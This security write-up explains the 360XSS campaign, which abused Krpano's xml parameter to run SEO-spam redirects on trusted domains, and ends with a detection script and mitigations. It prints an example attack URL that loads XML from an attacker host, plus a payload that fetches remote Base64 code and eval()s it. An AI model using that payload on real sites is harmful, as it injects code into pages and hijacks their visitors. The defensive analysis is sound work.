SEO Poisoning through XSS Vulnerabilities: The 360XSS Campaign

The latest 360XSS campaign, which combines trusted domain exploitation with cross-site scripting vulnerabilities, is an advanced development in harmful search engine optimization (SEO) strategies. I’m especially surprised by how the attackers turned an apparently straightforward mirrored XSS vulnerability into an extensive operation impacting more than 350 well-known websites, While highly sophisticated, this capability presents a dual-edged sword — offering remarkable potential yet posing significant security risks.

The Attack Mechanism

This attack’s genius is in its capacity to address a basic issue with reflected XSS vulnerabilities: user interaction. In the past, victims of reflected XSS had to click on malicious URLs. By using search engines as the distribution channel, the 360XSS campaign got over this restriction.

The attack chain worked as follows:

1. Attackers identified websites utilizing vulnerable versions of the Krpano framework, primarily those older than version 1.20.10, exploiting security flaws to facilitate unauthorized access or malicious activities.

2. They injected malicious scripts by exploiting the XML argument in conjunction with the passQueryParameters option, leveraging this vulnerability to execute unauthorized code within the affected Krpano framework.

3. These malicious scripts injected hidden content and spam-related keywords into the webpage, manipulating search engine indexing on compromised yet reputable domains.

4. As unsuspecting users clicked on these search results, they were redirected to legitimate but compromised websites.

5. Upon execution of the XSS payload, users were further redirected through a chain of trusted domains, ultimately landing on spam-related content.

# Example of malicious URL exploiting the vulnerability
https://trusted-university.edu/virtualtour/index.html?xml=https://attacker-controlled-site.com/malicious.xml

# The malicious XML file content
<krpano>
  <action name="startup" autorun="onstart">
    js(
      fetch('https://legitimate-compromised-site.com/data.txt')
      .then(response => response.text())
      .then(data => {
        const decoded = atob(data);
        eval(decoded);
      })
    );
  </action>
</krpano>

Domain Trust Exploitation

This strategy was effective because it exploited the inherent trust search engines place in high-authority domains. By compromising websites belonging to:

• Government portals

• U.S. state government websites

• Prestigious universities, including Yale

• Fortune 500 companies

• Major hotel chains

• Reputable news organizations

Attackers were able to “borrow” the domain authority and credibility these sites had built over time. Search engines like Google, which prioritize results from well-established domains, inadvertently boosted the visibility of these hijacked pages, granting them premium placement in search results and increasing the likelihood of user interaction.

Multi-Stage Payload Delivery

This attack’s effectiveness stemmed from its multi-stage payload delivery, designed to evade detection by security systems. The staged execution unfolded as follows:

1. Initial Compromise: The first hacked URL contained an XML parameter engineered to redirect users.

2. Trusted Site Redirection: This parameter pointed to another legitimate and trusted website, reducing suspicion.

3. Encoded Payload Execution: The second site leveraged an XML document to execute a Base64-encoded payload, masking its true intent.

4. Final Content Retrieval: Once decoded, the payload fetched the targeted advertising material from yet another trusted domain.

This chain of redirects through trusted domains effectively laundered the malicious nature of the final destination, making it extremely difficult for security solutions to detect, or flag.

Impact and Monetization Strategy

The primary objective of this campaign was to exploit hijacked websites to serve advertisements, primarily promoting:

• Adult content

• Dietary supplements

• Online gambling platforms

• Fake news websites

Additionally, some compromised pages were weaponized to artificially inflate YouTube video views, suggesting a diverse monetization strategy beyond simple ad placements.

Notably, the absence of more destructive payloads — such as malware deployment or credential theft — suggests that this operation was likely orchestrated by an unethical advertising network rather than conventional cybercriminals. Instead of engaging in direct cybercrime, the attackers focused on maximizing ad revenue through fraudulent impressions, effectively laundering traffic through trusted, high-authority domains to evade detection.

Why it was Difficult to Detect

This attack was exceptionally stealthy due to several key factors:

1. Leveraging Trusted Domains — Every stage of the attack chain utilized legitimate, high-authority websites, reducing suspicion and bypassing traditional blacklists.

2. Reflected XSS with No Persistent Footprint — Since the XSS payload was reflected rather than stored, it left minimal forensic evidence on compromised servers, making detection and remediation difficult.

3. Exploitation of a Legitimate Framework Feature — Instead of targeting an obvious software vulnerability, the attackers misused an existing feature within the Krpano framework, allowing the attack to blend in with normal functionality.

4. Multi-Stage JavaScript Execution via Redirections — The payload executed across multiple redirections, effectively obfuscating the attack’s origin and making it harder for security tools to track the malicious activity.

These tactics combined to create a highly evasive campaign, allowing attackers to operate under the radar while maximizing fraudulent ad revenue.

Detection Script for Website Owners

// Run this in browser console to detect potential 360XSS compromise
(function detectXSSPayloads() {
  // Check for suspicious hidden content
  const hiddenDivs = Array.from(document.querySelectorAll('div')).filter(div => {
    const style = window.getComputedStyle(div);
    return (style.position === 'absolute' && 
           (style.left === '-9999px' || style.top === '-9999px'));
  });

  // Check for suspicious scripts with base64 or eval
  const scripts = Array.from(document.scripts);
  const suspiciousScripts = scripts.filter(script => 
    script.text.includes('atob(') || 
    script.text.includes('eval(') ||
    (script.text.includes('setTimeout') && script.text.includes('window.location'))
  );

  if (hiddenDivs.length > 0 || suspiciousScripts.length > 0) {
    console.warn('POTENTIAL XSS SEO POISONING DETECTED!');
    console.log('Suspicious hidden divs:', hiddenDivs);
    console.log('Suspicious scripts:', suspiciousScripts);
    return true;
  }
  return false;
})();

Defensive Strategies

For Businesses Using the Krpano Framework

To mitigate the risk of exploitation, organizations leveraging Krpano should implement the following security measures:

• Update to Krpano version 1.22.4 or higher to patch known vulnerabilities.

• Set passQueryParameters = false by default to prevent unauthorized parameter injection.

• Restrict the execution of external scripts to limit the risk of malicious code injection.

• Regularly audit outbound links and unusual content using Google Search Console or similar tools to detect unauthorized modifications.

<!-- VULNERABLE CONFIGURATION -->
<script src="krpano.js"></script>
<div id="pano" style="width:100%;height:600px;"></div>
<script>
    embedpano({
        xml: "tour.xml",
        target: "pano",
        html5: "auto",
        passQueryParameters: true  // Dangerous: passes all URL parameters without filtering
    });
</script>

<!-- SECURE CONFIGURATION -->
<script src="krpano.js"></script>
<div id="pano" style="width:100%;height:600px;"></div>
<script>
    embedpano({
        xml: "tour.xml",
        target: "pano",
        html5: "auto",
        passQueryParameters: false,  // Safest option: disable parameter passing
        // Alternative: use a strict allowlist if parameters are needed
        // passQueryParameters: ["startscene", "startactions"]
    });
</script>

For the Broader Security Community

Security professionals and organizations should take proactive steps to protect against similar attack techniques:

• Deploy XSS protection headers (CSP, X-Frame-Options, Referrer-Policy) to harden defenses against script injection attacks.

• Watch for suspicious search patterns or unexpected spikes in traffic from SEO poisoning attacks leveraging your domain.

• Recognize that misconfigurations can be just as dangerous as code vulnerabilities; ensure security settings are properly configured to reduce attack surfaces.

Conclusion

The 360XSS campaign serves as an example of how attackers are always improving their methods and coming up with inventive ways to profit from even seemingly straightforward vulnerabilities. Attackers developed a complex, extensive scheme that transformed a mirrored XSS vulnerability into a potent SEO poisoning platform by taking advantage of the trusting relationship that exists between search engines and well-known websites.
This instance serves as a reminder that security extends beyond patching known vulnerabilities to include secure configuration of legitimate features. It also emphasizes how attackers are continuously motivated to target ostensibly low-risk elements of high-value websites due to the significance of trusted domains.